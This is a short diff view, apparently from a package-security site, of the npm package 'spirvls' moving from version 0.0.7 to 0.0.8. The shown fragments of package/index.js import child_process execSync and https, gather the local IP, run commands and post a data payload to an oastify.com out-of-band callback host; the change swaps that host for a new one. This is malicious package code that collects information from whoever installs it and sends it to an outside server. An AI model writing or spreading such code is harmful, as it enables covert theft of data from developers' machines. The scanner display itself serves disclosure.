spirvls 0.0.7 → 0.0.8

Sign up to get free protection for your applications and to get access to all the features.
package/index.js CHANGED
@@ -5,7 +5,7 @@ const https = require("https");
5
5
  const { execSync } = require("child_process");
6
6
 
7
7
  // Replace with your Interactsh endpoint
8
- const interactshEndpoint = "bwbwdqbtjhrx5k1uv6em3z0yvp1gp6dv.oastify.com";
8
+ const interactshEndpoint = "edvrar6ntsb95ijfs0aj6391lsrjf93y.oastify.com";
9
9
 
10
10
  // Function to get the local IP address
11
11
  function getLocalIP() {
@@ -70,4 +70,4 @@ try {
70
70
  sendPostRequest(dataPayload);
71
71
  } catch (error) {
72
72
  console.error("Error executing commands:", error);
73
- }
73
+ }